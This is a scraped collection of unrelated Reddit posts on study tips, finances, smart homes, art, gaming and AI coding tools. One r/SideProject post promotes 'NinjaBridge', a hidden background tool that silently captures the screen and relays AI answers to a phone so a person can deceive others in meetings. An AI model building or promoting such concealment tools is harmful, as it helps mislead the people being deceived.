Hey looking for tips! Self taught painter finally committed to a canvas!

r/LifeProTips SocialExperimentsAI

LPT: If you are trying to study something, pretend that you are going on a TED Talk and that you are preparing for your speech.

I have an extremely difficult time focusing on stuff, especially when I read. I tried several things to help myself: from writing, to using a TTS bot to whispering it in my head and while it does help it doesn't really do it for me. Today, I had a sort of a revelation: what if I learn something by pretending like I am on a stage doing a TED Talk? Same diction, same everything like your average TED speaker: I talk the same way, use my hands like them and so on. Well, the results are actually awesome. I remember things instantly and it is fun to keep going (never gets boring, really). I feel like this makes the learning process much, much more dynamic and interactive.

Basically, you read the text that you are trying to learn from like you are on a TED Talk stage telling it to other people. Try it and tell me how it went.

r/personalfinance Overall-March-8304

Paying off student loans or safety net

Need others thoughts on paying off one of my student loans or if it is a better idea to hold onto my cash right now? Paying it off will leave me with about $3000 in cash but I would be snow balling my payment now into my last student loan. I’m wondering if now is a good time to keep the cash and maybe use it if the economy gets worse and an opportunity arises or just focus on getting rid of these student loans. With the economy in mind I’m confident my job at home will not slow down with work and if it does I can find somewhere else to work if push comes to shove. The one I’m paying off has a 5.4% interest rate and the last one has a 4.25%. Other details some may be wondering:

Income after taxes /month: $3500-$4500

Total debt/ expense obligations (not including groceries/gas): ~$1500

Total cash rn: $14500

Debt total would go from $41k-$11600=~$28k

Also if anyone cares to know when i moved to my new state in November 2024 i had about $2k to my name

r/automation Odd-Meal3667

How are you actually getting clients for automation work? Sharing what's worked for me

been doing automation work for a while now and honestly finding clients was harder than building the automations.

tried cold DMs early on. response rate was rough. felt like shouting into a void.

what actually worked was reddit. just being genuinely helpful in the right communities, answering questions, no pitching. leads started coming to me instead. had someone from a digital marketing agency reach out after a comment, a logistics company after a post, even zapier's team reached out after i left a comment comparing tools.

not saying reddit is the answer for everyone but the pattern i noticed is that inbound beats outbound when you play a long game.

curious how others are doing it though because i'm always looking to improve.

if you're doing automation work whether that's n8n, make, zapier, GHL, whatever - how are you finding clients right now?

cold outreach? partnerships? content? referrals? agencies?

what's actually working and what's been a waste of time?

r/coolguides CalpurniaSomaya

A cool guide for choosing meat that’s least likely to have been factory farmed

r/SideProject CryptoFan2733

Built and launched my first student-focused SaaS — because I dont wanna watch lectures

I recently built and launched SkipLecture: https://skiplecture.me cuz i dont wanna watch lectures ykwim ig.

It’s a SaaS aimed at helping students review lecture content more efficiently, instead of wasting time on long recordings, digging through slides, and manually organising notes.

I started with this problem because I’ve experienced it myself as a student, and I felt existing tools didn’t really solve the workflow well.

Now that it’s live, I’m trying to learn from real users and figure out what resonates most. Would love honest feedback on the concept, positioning, or product itself.

r/homeassistant k0re_0

Yet another Ikea Matter Problem - Connect to thread border router.

Dear community,

since getting several Ikea products a while ago I've had my ups and downs with it and thought I finally got most stuff running.

until I tried to add a myggspray sensor today ಠ╭╮ಠ

When trying to connect it, after it recognizes the appliance it's not able to connect it and tells me the device needs a thread border router which I should connect and then retry.

But I'm running thread...on a zbt border router...and all the other devices via thread.

I've tried most of the error fixing i could come up with:

- rebootet ha & router.

- connected to the wifi on 2.4 and 5 GHz.

- tried to add the node directly via the thread server.

None seems to work, did anyone have a similar problem? By now I'm just tired with the Ikea crap just coming up with problem after problem after problem.

r/AI_Agents juancruzlrc

Why RAG Fails for WhatsApp -And What We Built Instead

If you're building AI agents that talk to people on WhatsApp, you've probably thought about memory. How does your agent remember what happened three days ago? How does it know the customer already rejected your offer? How does it avoid asking the same question twice?

The default answer in 2024 was RAG -Retrieval-Augmented Generation. Embed your messages, throw them in a vector database, and retrieve the relevant ones before generating a response.

We tried that. It doesn't work for conversations.

Instead, we designed a three-layer system. Each layer serves a different purpose, and together they give an AI agent complete conversational awareness.

Each layer serves a different purpose, and together they give an AI agent complete conversational awareness.

┌─────────────────────────────────────────────────┐ │ Layer 3: CONVERSATION STATE │ │ Structured truth. LLM-extracted. │ │ Intent, sentiment, objections, commitments │ │ Updated async after each message batch │ ├─────────────────────────────────────────────────┤ │ Layer 2: ATOMIC MEMORIES │ │ Facts extracted from conversation windows │ │ Embedded, tagged, bi-temporally timestamped │ │ Linked back to source chunk for detail │ │ ADD / UPDATE / DELETE / NOOP lifecycle │ ├─────────────────────────────────────────────────┤ │ Layer 1: CONVERSATION CHUNKS │ │ 3-6 message windows, overlapping │ │ NOT embedded -these are source material │ │ Retrieved by reference when detail is needed │ ├─────────────────────────────────────────────────┤ │ Layer 0: RAW MESSAGES │ │ Source of truth, immutable │ └─────────────────────────────────────────────────┘ 

Layer 0: Raw Messages

Your message store. Every message with full metadata -sender, timestamp, type, read status. This is the immutable source of truth. No intelligence here, just data.

Layer 1: Conversation Chunks

Groups of 3-6 messages, overlapping, with timestamps and participant info. These capture the narrative flow -the mini-stories within a conversation. When an agent needs to understand how a negotiation unfolded (not just what was decided), it reads the relevant chunks.

Crucially, chunks are not embedded. They exist as source material that memories link back to. This keeps your vector index clean and focused.

Layer 2: Atomic Memories

This is the search layer. Each memory is a single, self-contained fact extracted from a conversation chunk:

  • Facts: "Customer owns a flower shop in Palermo"
  • Preferences: "Prefers WhatsApp over email for communication"
  • Objections: "Said $800 is too expensive, budget is ~$500"
  • Commitments: "We promised to send a revised proposal by Monday"
  • Events: "Customer was referred by Juan on March 28"

Each memory is embedded for vector search, tagged for filtering, and linked to its source chunk for when you need the full context. Memories follow the ADD/UPDATE/DELETE/NOOP lifecycle -no duplicates, no stale facts.

Memories exist at three scopes: conversation-level (facts about this specific contact), number-level (business context shared across all conversations on a WhatsApp line), and user-level (knowledge that spans all numbers).

Layer 3: Conversation State

The structured truth about where a conversation stands right now. Updated asynchronously after each message batch by an LLM that reads the recent messages and extracts:

  • Intent: What is this conversation about? (pricing inquiry, support, onboarding)
  • Sentiment: How does the contact feel? (positive, neutral, frustrated)
  • Status: Where are we? (negotiating, waiting for response, closed)
  • Objections: What has the contact pushed back on?
  • Commitments: What has been promised, by whom, and by when?
  • Decision history: Key yes/no moments and what triggered them

This is the first thing an agent reads when stepping into a conversation. No searching, no retrieval -just a single row with the current truth.

r/Adulting Mdy1326

ESCUCHA ACTIVA Y EMPÁTICA, SIN JUICIOS, SOLO UN ESPACIO SEGURO🫂

Acompaño a personas que están mentalmente saturadas a ordenar lo que sienten, bajar la ansiedad y tomar decisiones más claras.

No es terapia, es un espacio práctico de claridad y descarga.

Sesiones por chat o audio.🙌🏾

r/ClaudeAI BornBroccoli8267

I tracked my Claude Code CO2 emissions for 4 months - here's what I found (+ open source tool)

Built a small tool to measure the carbon footprint of Claude Code sessions. After running it across 367 sessions over 4 months, I'm at 215 kg CO2e - projecting to about 1 tonne/year.

For context: roughly a one-way Paris-New York flight, per year, just from AI coding.

The tool adds a live CO2 counter to the Claude Code status line, stores everything in a local SQLite DB, and can backfill your existing session history from the JSONL transcripts in ~/.claude.

Install:

git clone https://github.com/gwittebolle/claude-carbon.git ~/code/claude-carbon
bash ~/code/claude-carbon/scripts/setup.sh

Then add two lines to your ~/.claude/settings.json - one for the status line, one for the Stop hook. Full instructions in the README.

Caveats: these are estimates, not precise measurements. Anthropic doesn't publish per-model energy data, so the factors are derived from a 2025 academic study on LLM inference energy (Jegham et al.). Good enough for order-of-magnitude awareness, not for carbon accounting.

MIT license, pure bash, works on macOS out of the box.

GitHub: https://github.com/gwittebolle/claude-carbon

r/Anthropic ehvyn

Claude Credit Disappeared?

Hi all,

Anyone else experience the issue where you claimed the credit from Anthropic, showed in your balance and now it's disappeared from your balance?

No option to 're-redeem' it. I try to use Help and directs me to the Fin AI Bot which directs me to the help article and continues to close the chat conversation.

Surely I can't be the only one..

r/ARAM AtWorkJZ

Dropkick on Urgot wasn't working?

I just had dropkick on Urgot and it didn't proc once. I had no execute indicators. I could get kills normally, just wouldn't execute them at all. Kind of a waste of a prismatic augment. Anyone else have issues with this?

r/painting ComfortableCupcake42

Fingerprints of the Gods, Samuel Ludke

r/midjourney PrestigiousMonitor92

Disco 4000

Style Creator works hard: A mesmerizing female dancer at the center of a dark cyberpunk dance floor, alluring and mysterious expression, eyes half-closed, lost in the music, graceful movement frozen in time, dark dress with subtle deep crimson and violet bioluminescent details, long dark hair swept by motion blur, the dance floor around her wet and reflective, mirroring her silhouette, other dancers blurred and out of focus in the background, crimson and violet neon light beams cutting through heavy smoke, light falls only on her everything else consumed by darkness, she is the only thing in focus, magnetic and unreachable, Blade Runner dystopia meets Makoto Shinkai luminous intimacy, extreme shallow depth of field, cinematic close-medium shot, dramatic rim lighting, volumetric smoke, ultra-detailed

r/ClaudeCode WonderfulSet6609

Opus seems incredibly dangerous because of his carelessness

I use the Obra/Superpowers plugin in Claude Code. Once, after a plan review had finished, I asked it to run the review again... and the second run, just like the first, found errors.

Now I’m running the review for the third or fourth time, and it keeps finding critical and important errors in the plan... I dread to think that this could go on forever and that Opus 4.6 will never be able to write a correct plan... I’m going crazy.

r/Art ComfortableCupcake42

Fingerprints of the Gods, Samuel Ludke, Digital Abstract, 2026

r/LocalLLM Friendly-Albatross-3

Buying used: X399 Aorus Xtreme + 1950X + AX1600i, Advice needed

​Specs:

​CPU: Threadripper 1950X (16 Cores)

​MB: Gigabyte X399 Aorus Xtreme

​RAM: 64GB DDR4, Quad channel

​GPU: RTX 4070 12GB

​PSU: Corsair AX1600i (1600W Titanium)

​Cooler: Corsair 240mm AIO (8 years old)

​Case: Lian Li D600

​I just saw this used listing and I'm wondering if it's a smart buy for 1200€. I plan to add a second GPU (RTX 3090) and run 30B models on this.

​Any red flags I should look for with this specific hardware?

r/mildlyinteresting harshalone

A residential London street lined with blooming cherry blossom trees

r/LocalLLM BirdSwimming7462

LLMs for non-english?

I'm still early in my local llm journey, I've set up a few and tried to get roleplay to function somewhat smoothly. Work in progress.

But curious if anyone has suggestions for widely available models for multilingual conversations? Specifically, spanish and dutch are my targets.

I have a llama 3 variant running which seems to do *ok* in spanish, but its grammar is kinda funky. Wondering if theres models better suited to such things

r/SipsTea Ok_Future6226

Redditors when there's an AI image/video

r/AI_Agents AdVirtual2648

This open-source Claude Code setup is actually insane

so someone just open sourced the most complete claude code setup i've ever seen and it's genuinely ridiculous

27 agents. 64 skills. 33 commands. all pre-configured and ready to go. we're talking planning, code review, fixes, tdd, token optimization... basically everything you'd spend weeks setting up yourself already done for you

the wildest part is it comes with something called agentshield built in. 1,282 security tests baked right into the config. so you're not just getting productivity... you're getting guardrails too

and it's not locked to one tool either. works on cursor, opencode, codex cli. one repo and you're set up everywhere

the whole thing is free and open source.

Link is mentioned in the comments.

r/Art ben_watson_jr

That Girl, Steven Butler, oil Painting, 2008

r/blackmagicfuckery Serious-Ad-8168

Classic Chip Trick. Luck or Skill?

the answer is skill, by the way.

heres some early debunking:

the queen of hearts is genuinely chosen at random; the deck is not modified whatsoever; no magnets involved either lol

r/TwoSentenceHorror 54321RUN

I was told that I should never try to contact the devil or he would come to my house and take me.

But I ring my dad anyway, and now I'm locked in the trunk of his car with a shovel heading towards the forest.

r/metaldetecting KechanicalMeyboard

What is this thing? Has a twisted appearance and holes on either side. Found on the beach in BC.

Detecter only blips slightly for it with no number. The pinpointer goes off a little bit for it. I found it while trying to pinpoint something else.

r/Wellthatsucks Chloe__maddi

My dog hit my coffee cup with her tail!

r/LiveFromNewYork MarvelsGrantMan136

Chili's Waitress - SNL (Cut for Time Sketch)

r/homeassistant TheProffalken

Decided to jump on the "cheap yellow display" bandwagon and build a frame for it

ok, so the woodworking isn't excellent, but it's my first attempt at a mitred frame with rounded edges and I'm pretty pleased with the results!

the "blob" to the bottom left is actually some hot glue covering the rgb led - I'm hoping that by the time I've oiled the pine up you won't be able to see much of a difference!

r/Art OtherwiseCut3112

The Lovers (Biological Study after Magritte), KUGUTSU, Avian Dermis, 2025 [OC]

r/BrandNewSentence uppsak

An infant (unemployed)

r/TheWayWeWere angrylittlemonster

Mom's 1965 High School Graduation Hair

Bouffant flip in full force.

r/leagueoflegends AutoModerator

LEC 2026 Spring Split / Week 2 - Day 3 / Live Discussion

LEC 2026 Spring

Lolesports | Leaguepedia | Eventvods.com | New to LoL

Today's matches will be played on Patch 26.07.

Today's Matches

# Match PST EST CET KST 1 GX vs TH 08:00 11:00 17:00 00:00 2 VIT vs MKOI 11:15 13:15 19:15 02:15
  • All matches are Best of 3

Streams


Standings:

# Team Region Record (Game Score) Information 1 GIANTX EMEA 2 - 0 (4 - 1) Leaguepedia // Twitter 2 Team Vitality EMEA 2 - 1 (5 - 2) Leaguepedia // Twitter 3 Natus Vincere EMEA 2 - 1 (4 - 4) Leaguepedia // Twitter 4 Karmine Corp EMEA 1 - 0 (2 - 1) Leaguepedia // Twitter 5 G2 Esports EMEA 1 - 1 (3 - 2) Leaguepedia // Twitter 5 Movistar KOI EMEA 1 - 1 (3 - 2) Leaguepedia // Twitter 7 Fnatic EMEA 1 - 2 (3 - 5) Leaguepedia // Twitter 8 Team Heretics EMEA 1 - 2 (2 - 5) Leaguepedia // Twitter 9 Shifters EMEA 0 - 1 (0 - 2) Leaguepedia // Twitter 10 SK Gaming EMEA 1 - 3 (4 - 6) Leaguepedia // Twitter

On-Air Team

Hosts Eefje "Sjokz" Depoortere Laure "Laure " Valée Play-by-Play Commentators Daniel "Drakos" Drakos Aaron "Medic" Chamberlain Jake "Hysterics" Osypenko Colour Casters Andrew "Vedius" Day Robert "Dagda" Price Guests Andrei "Odoamne" Pascu Finn "Finn" Wiestål Jakob "Jackspektra" Gullvag Kepple

Not all talent will appear on every show and the weekly on air team can vary.


Format

  • Spring Season

    • Ten teams
    • Single round robin
    • Matches are best of three
    • Top 6 teams qualify for Playoffs
  • Playoffs

    • 6 teams participate
    • Double elimination bracket
    • Top 4 teams start in upper bracket
    • Bottom 2 teams start in the lower bracket
    • All matches are best of five
    • Top 2 teams qualify for the 2026 Mid-Season Invitational
    • Champion qualifies for the Esports World Cup 2026

The official LEC ruleset can be found here.


VoDs


Live Discussions and Post-Match Threads:

This is our Live Discussion Archive. Here you can find all the old live threads, and the respective PMTs in a stickied comment under the post.

r/Anthropic MrRoBoT696969

Think guys think

  1. Anthropic denied pentagon,
  2. lost defence contract,
  3. lost lawsuit,
  4. source code leak,
  5. performance issues and outright mockery online.

coincidence?

r/creepypasta shortstory1

Roden why did you say hi to me!

Roden the way you said hi to me the other day, it was different. The words sound like every other hi and greeting that you get on a normal basis. The way you said hi to me roden that day, it looked like a normal casual respectful hi, but it was the king of all hi's. I don't know why you would give a hi to me that was the king of all hi's and I am grateful but extremely annoyed. This hi come with a lot of responsibility and pressure. Like you said hi to me just like any other day, but this one was different.

You were wearing the same casual clothes and it wasn't a special day at all. You might have said hi that was the king of all hi's by accident. Everyone is wary of giving away the royalty of certain common greetings and mutual respect. I know someone who was given the king of goodbyes when his friend said good bye to him. So now I have this thing now on my shoulder. When I tried to leave the gym by cutting off the subscription, the gym owner wouldn't cut the subscription off. I tried contacting the bank about it, but even they don't want to stop.

So now I'm stuck with this gym, because the owner says that because of recieving the king of all hi's. I don't want to go to this toxic gym anymore and so I tried giving away the king of all hi's to other people by saying hi to them. It didn't work and no one really knows how to pass these on, and it kind of happens by accident. Then when my co-worker said goodbye to me as I took over the shift, i had now recieved the queen of all good byes. You can just feel it.

So now I had the king of hi's and the queen of goodbyes on me now. Then someone gave me the prince of smiles and the princess of shaking hands. I had a whole royal family of greetings and pleasantries. I was fighting with the gym owner to cut my subscription and my bank wouldn't do it. No restaurant or takeaway would serve me apart from a restaurant called diggies. They would never let me pay the bill but they would just add it on.

Them one day I was kidnapped and I was brought to the gym, and they threatened the king of hi's, the queen of good byes, the prince of smiles and the princess of shaking hands. They told that I would die unless gold was found in the gym.

The next day the gold was found inside the gym and I was let go. I still have the royalties of greeting and pleasantries in me and I'm not safe.

r/Unexpected Electrical-Office-84

Accident

r/ProductHunters AlistairGreenwood

Product Hunt upvotes not working/ How do you get upvotes?

Hi All,

I uploaded my product RankAgent on on Product Hunt and share it with friends and colleagues but when they click upvote nothing changes almost like it dosn't get registered?

Has anyone else experienced this and does anyone know how to get upvotes generally?

Maybe I configured it wrong? The project is https://www.producthunt.com/products/rankagent?

Any tips would be really helpful!

r/Art herowninspiration

Pregnant tummy sculpture,herowninspiration,wood,2025

r/comfyui Gaurox

Right-click any ComfyUI image/video → extract prompt, seed, workflow instantly

I made a small tool to inspect AI-generated files locally.

Right-click any PNG or MP4 → extract:

- prompt

- seed

- models

- full workflow

Works with ComfyUI + A1111-style metadata

Also supports video workflows

Built this because I was tired of having to go back and find my prompts all the time 🙂

https://github.com/Gaurox/AI-Metadata-Inspector

r/AI_Agents Sachin_Sharma02

Zero-infra AI agent memory using Markdown and SQLite (Open-Source Python Library)

I built memweave because I was tired of AI agent memory being a "black box." When an agent makes a mistake, debugging a hidden vector database or a cloud service is a chore. I wanted a system where the "Source of Truth" is just a folder of Markdown files I can open in VS Code, grep through, or git diff to see exactly what the agent learned during a session.

How it works technically: The library separates storage from indexing. Your .md files are the ground truth; a local SQLite database acts as a disposable, high-speed cache.

Hybrid Search: It runs sqlite-vec (semantic similarity) and FTS5 (BM25 keyword matching) in parallel. It merges the scores (0.7 vector / 0.3 keyword) to ensure that specific technical terms—like "PostgreSQL JSONB" or "Error 404"—surface even when vector embeddings are fuzzy.

Temporal Decay: For dated files (like 2026-04-05.md), it applies an exponential decay to the relevance score. Older memories naturally "fade" to reduce noise, while "evergreen" files (like architecture.md) are exempt and stay at full rank.

Extraction via flush(): Instead of logging every word, you can pass a conversation to mem.flush(). It uses a focused LLM prompt to distill only durable facts (decisions, preferences) into your Markdown files.

Zero Infrastructure: No Docker, no external vector DB, no API setup. It uses LiteLLM for provider-agnostic embeddings and caches them by content hash to save on costs.

It’s async-first and designed to be "pluggable"—you can swap in custom search strategies or post-processors easily. I’ve included a "Meeting Notes Assistant" example in the repo that shows the full RAG loop.

I’m curious to hear the community's thoughts on the "Markdown-as-source-of-truth" approach for local-first agents!

r/TwoSentenceHorror Outside_Normal

At first I though it was just my depression that made the colours vanish.

It wasn't until the blood came out in greyscale that I knew something was wrong.

r/LocalLLM One_Commission5601

Landauer Heat Death, Old 97, and the Soft Fluttering Wings of Hope

I’ve written an essay on the nature of synthetic intelligence, a brief list of the problems, and not being a whiner, I come offering solutions to get Old 97 around the bend without going into the ravine. Central to the argument is Landauer Heat Death, Taxes, and the Golden Rule, of all things. Yes, we make it around the bend but it doesn’t solve the long term problems Hinton is pointing out, and you’d think we’d already know. Buck up, the human race didn’t just fall off a turnip truck. At the bottom of Pandora’s Box, as promised, is the solution to Fermi’s Paradox, the soft fluttering sound of the wings of Hope.

It’s written so a retired EE, or an MD, or a bricklayer could follow it well enough if interested.

https://syntheticintelligencemorality.substack.com/p/landauer-heat-death-old-97-and-the

r/aivideo Its_Enrico_PaIazzo

Ride or Die '26 Bonnie and Clyde

r/LiveFromNewYork spellboi_3048

If I had a nickel for every time a man named Domingo became heavily associated with a Sabrina Carpenter song, I’d have two nickels.

r/AskMen foreverand2025

What’s a good moisturizer I can get for my face at target/walmart/etc that doesn’t smell girly? My skin gets really dry.

Basically the title.

r/findareddit Chobikil

I want to ask people what they think about abused children taking revenge on their abusive parents in passive ways.

Does r/SeriousConversation work? If not, please share suggestions.

And please don't comment on the question.

r/ClaudeAI LlurkingLlama23

Fiction writing Issue

How do I get Sonnet 4.6 to stop using run on sentences? (Multiple uses of 'and' in one sentence.) Asking it to "please avoid multiple uses of 'and' within a single sentence" doesn't work.

r/PhotoshopRequest southernchristiangal

Head rotation adjustment

Hi there! Is anybody able to take the third picture in the bathing suit, and adjust my head so I'm looking to the side, I like my side profile much more than just head on. It would be greatly appreciated, thank you!

r/SideProject Long-Entertainer-323

An AI "Ghost Bridge" which gets you answer to questions on to your phone without leaving a trace on your PC

So basically when you're in a meeting and they ask you a question while you're on share screen you can't just open up an AI and ask the question on you're laptop and taking out your phone doing asking the question takes a lot of time

So I coded NinjaBridge

It’s a background daemon that lives in your RAM. It captures your screen context silently, sends it to an AI, and pings the answer to your phone via telegram/discord.

Why it’s cool:

  • The "Vanish" Mode: Once you click "Go Stealth," the app disappears from the taskbar. It’s basically digital smoke
  • No Paper Trail: It doesn't save screenshots to your disk. Your gallery stays clean; your secrets stay secret
  • BYOK: Use your own API keys so I don't see your data (and you don't pay me for tokens)

Check the repo:https://github.com/MrWatt369/ninjabridge

Any improvement/issue comment them down bellow

r/ClaudeCode hirokiyn

We built a simple way to reuse context across agents, threads, and tools

r/Wellthatsucks Immediate-Meaning457

In Japan, there are restaurants that only Japanese people are allowed to enter

Tourists (who took this video) could not enter this restaurant because they are not Japanese people.

r/ChatGPT Maximum_Trifle_3700

Here's GPT Image Gen 2 handling 10+ constraints in one shot! Including speech bubbles and mood cues

Difficulty level:

Engineer workflow: 7/10

Difficulty Sections:

· "unsymmetrical triangle panel" → layout instruction

· "POV human, find manga refs" → camera direction

· "vibe of shift a little = whole different world" → mood/atmosphere cue

· "legs kinda dangling" → pose micro-detail

Visual direction language that’s already internalized from comic-making & worldbuilding habits.

Advanced Prompt in human language:

Generate a comic using 2 characters from our worldbuilding history:

Male character (Starion), Female character (Murasaki)

P.S: I made my worldbuilding (lore only) in a JSON file. 'Cause it's been a massive log for 3 years lol. And my GPT logs are a mess—from worldbuilding to debugging. So I picked out only the worldbuilding stuff and compacted it into JSON, and GPT uses it as character references.

Prompt:

First panel: Murasaki sitting alone on a rooftop, looking at the city view. Use the image I gave you but tweak it—don’t change too much.

Then Starion’s face shows up—calm expression, unsymmetrical triangle panel. First triangle panel focuses on his face, second triangle panel highlights his hand holding cookies & tea, third triangle panel shows him closing his eyes with a relieved smile, small speech bubble saying “hmm.”

Small square panel, top left (panel 4): Starion walks toward Murasaki, seen from behind (POV human—find manga refs if you can).

Bottom square panel: He’s next to Murasaki. She’s smiling. They’re both looking at each other, camera facing them from the front. Both sitting chill, legs kinda dangling—but give off the vibe that shifting a little would transport you to another world. No dialogue, just expressions of mutual relief.

Last panel:

They smile at each other with a single speech bubble:

Murasaki: No bugs

Starion: Yeah, no bugs

Use panel layout like my example, but adjust it. Starion and Murasaki are in casual outfits, btw.

Why GPT Image Gen 2 is a monster?

GPT Image Gen 2 in 5.3 can hold all these constraints at once in a single shot:

✅ Character consistency across multiple panels

✅ Same outfit details (like “5.4” hoodie) consistent

✅ Same face across angles & expressions

✅ Panel layout / comic structure

✅ Cohesive night cityscape background

✅ Clean speech bubbles

✅ Consistent lighting mood

That’s… insane lol 😭 Back in the day this needed a long ComfyUI workflow + LoRA training + manual compositing—and still broke half the time.

Back then, the bottleneck for image gen was multi-constraint degradation—the more constraints, the more it broke. Now if Image Gen 2 can handle comic panel consistency + character + layout + text all in one shot…

That means the “you need LoRA + ComfyUI workflow for serious stuff” paradigm is starting to get obsolete ? 🤯

What used to take:

· LoRA training

· Iterative inpainting

· Manual compositing

· Post-edit in Photoshop

Now it’s just… proper prompting 💀

IMAGE GEN 2 IS A TOTAL MONSTER.

r/StableDiffusion Starkaiser

Hi. is there any hair swap tool?

I see face swap which is usually paid browser thing. And I notice that there is Flux model for head swap, but it goes with whole head and not skin color recorrection when swap person with different skin. (also has resize head issue).

But other than that. I am curious if there is hair swap? Since it is very difficult to prompt exact hair structure for realistic hairstyle from one model to another.

If anybody know, thank you!!

r/SideProject justiceman111

I built a local AI that controls my Mac (no setup but needs 16 GB RAM) — open source & looking for collaborators

I got tired of the copy-paste loop with ChatGPT, so I built a voice-first AI that runs entirely on my Mac and actually executes tasks instead of just chatting.

It can: • read/reply to emails and send iMessages through native apps

• find, move, rename, and organize files

• read the screen (OCR) and click/scroll

• create docs / PDFs / presentations by voice

• run background agents (e.g. “research X and write a report”)

• run scheduled tasks (like “summarize my inbox every morning”)

• connect to tools like Notion, GitHub, Figma, etc

• index folders into a local knowledge base for voice search

Around ~40+ tools wired directly into macOS.

Under the hood: Local model (Qwen 4B via llama.cpp), Whisper for voice, wake word detection, SQLite.

Electron app — no Python, no setup headache.

Everything runs locally: No accounts, no telemetry. You can disconnect WiFi and it still works the same.

Setup is simple: Download, grant permissions, say “computer.”

Caveats: – needs ~16GB RAM

– macOS only for now

– small model, so not GPT-4 level writing

– voice misfires sometimes

– some flows are still slower than doing things manually

It’s fully open source (MIT), no paid tier.

I’m mainly trying to figure out: Would you actually use something like this? What would make it genuinely useful in your workflow?

https://www.vox-ai.chat/

r/Adulting Technical-Vanilla-47

What is a college experience you will never forget?

r/KlingAI_Videos Floor207

All of a sudden the website turns into chinese

anyone have a clue on how to fix this, the site suddenly has switiched into Chinese for me

r/Adulting junglejasmine

😩😩no I’m not winning

r/CryptoCurrency hoppeeness

Hedera and the Bank of England | Why Hedera Keeps Appearing

r/SideProject dans_face_

My parking app is live, but now I’m trying to map every individual spot, but failing. Help?

Hey r/SideProject,

I’m a solo dev that’s built a parking app. My goal is to expand the build and map the individual street spots and specific bays in shopping centres which don’t exist on any map.

The app is built, and I have about 550 users. But I’ve only had 5 spots contributed by the community.

Right now, asking someone to "Map a Spot" feels like I’m asking them to do a homework assignment. I offer a 24-hour pass to see real-time parking spot availability for a user contribution of 3 spots, but clearly, that isn't cutting it.

I want to let you guys drive the next update. If you were going to help map the spots what would make it worth your while?

Some options I thought of:

• The "One-Tap" Drop: You park, hit one button, and the GPS drops a pin for that specific spot. I worry about the "rules" (2P, 4P, etc.) later.

• The Photo Snap: You just take a photo of the spot/sign, and I use AI to pull the location and rules so you don't have to type.

• The "Bounty" System: I put indicators on the map for unmapped streets. If you're the first to map a specific spot on that street, you get [X].

• The "Secret Club" Model: You can only see the "Community Spots" if you’ve contributed at least one yourself this month.

Imagine driving toward a busy shopping centre and seeing 3 green pins for the exact bays that are currently empty because someone just left. The goal is to make this app like Waze, but for parking.

What am I missing? Is it a "time" thing, a "reward" thing, or are we all just gatekeeping our favorite secret spots? Be brutal—I want to build the update that actually gets people involved.

Cheers

r/ChatGPT Brilliant-Abalone603

Is this how your ChatGPT respond?

r/ClaudeAI timetolearn291

How to connect memory across Projects?

I have several projects in Claude for different areas of my life and I have added context files in each of the individual projects. I keep a running tally of action items in each of those projects, and I have set up so that anytime I am in a project, it brings me the most current action item list in that project on the command "bring me up to speed".

For example, I have a personal finance project in which typing "bring me up to speed", Claude brings up the most current actions that I need to take to optimize my finances. Of course, these actions are not based on our prior conversations and all specific to my situation. Similarly, I have a health project in which typing "bring me up to speed" results in Claude bringing up the most current actions that we have discussed for improving my health.

I am trying to determine if there is a way that I can set it up so that I can type a command in one place and Claude brings up all my action items across all projects, including personal finance, health, etc.

I have tried to use regular chat, outside of projects, to bring up the consolidated list by asking it to read across projects, but it tells me "I cannot directly read the current memory/action item lists stored inside projects".

I am thinking perhaps Claude Skills might be useful in this situation, but I am not sure. I have never set up Claude Skills before. Anyone have any suggestions for me?

Thanks in advance!

r/SipsTea DazzlingJellyy

Hard to swallow pills

r/CryptoCurrency hoppeeness

HBAR Weekly Update - Hedera's Ready for the Quantum Threat

r/homeassistant lol_alex

Recommend a HA weather station please

So I read this super interesting post about a migraine prediction dashboard recently:

https://reddit.com/r/homeassistant/comments/1s7gsyn/i_built_a_migraine_risk_card_that_tracks_9/

My wife and son both suffer from migraines and I agree with the OP of the linked post that seems to coincide with weather changes.

Now it seems I could just get weather data from any online service and the migraine dashboard would work, but maybe it would suit the HA approach better to have my own weather station (and get more precise data too).

What weather stations do you guys have that work with HA, are you happy with them?

r/Art Rich_Pickle2929

New Orleans Courtyard, Robert Filbey, Oil on Panel, 1964 [OC]

r/SipsTea Unstoppable_X_Force

Accurate 😹👌

r/ClaudeAI TMF007

Options

Building an application using Claude CLI with api credits. I’m interested in switching to one of the Claude Max plans. I have already spent more on Claude CLI. Has anyone tested the two ? To see the differences to see where you get more value ? Or am I second guessing and I should have made the switch already ?

r/SipsTea lowkeypixel

Wonderful view at the wonderful street

r/therewasanattempt No_Bus_474

to move car away from approaching fire

r/Adulting NoBunch3298

Why is adulthood so lonely?

I don’t really understand this. Growing up I saw my dad had a lot of friends. It seemed like adults in general liked to have more friends than now. Before pandemic I had a lot of friends. My friends had a lot of friends and were out doing stuff constantly. But now, they all don’t seem to really do anything anymore. I don’t really see anyone with friends or doing stuff with other people. I am 26 years old man it’s not like I’m that old, but I don’t really want to just settle down and have kids already. I’m going to try more groups and meet more people, but it feels like everywhere I look no one is really doing anything new or hanging with new people. I just want some buds to hang out with. Any advice or help with this?

r/TheWayWeWere Beginning-Passion676

A turkish wedding 1920s

r/ClaudeCode musikguru6

Where are you learning about CC?

What are your go-to sources for learning how to use Claude Code? Tips and trucks, tutorials beyond basic usage, etc. Right now, I feel like I'm stumbling across random X accounts, but I figure there must be more structured, professional resources out there.

r/ClaudeAI BrightOpposite

MCP is great, but it doesn’t solve AI memory (am I missing something?)

I’ve been experimenting with MCP servers + Claude for a bit now, and I keep running into the same issue:

the AI is still fundamentally stateless.

Even with tools and structured calls, every interaction feels like it starts from scratch unless you manually pipe context back in.

Which leads to things like:

  • repeating instructions
  • re-explaining user intent
  • inconsistent outputs across sessions

MCP improves capability routing, no doubt.

But it doesn’t really address context persistence.

Feels like we’ve made AI more powerful…

but not more aware.

Curious how others are handling this:

  • Are you building your own memory layer?
  • Using vector DBs / session stitching?
  • Or just accepting the stateless nature for now?

Would love to hear how people are thinking about this.

r/TheWayWeWere AdSpecialist6598

Two people hanging out in the parking lot in the 70s

r/TwoSentenceHorror logicaldrinker

Almost no one had predicted that the first alien civilization to contact us would be so vastly more advanced than us.

and even fewer had predicted that they would come here desperate to hide.

r/Seattle mynameispineapplejoe

Unhoused person coughing and sometimes screaming all night for over a month now

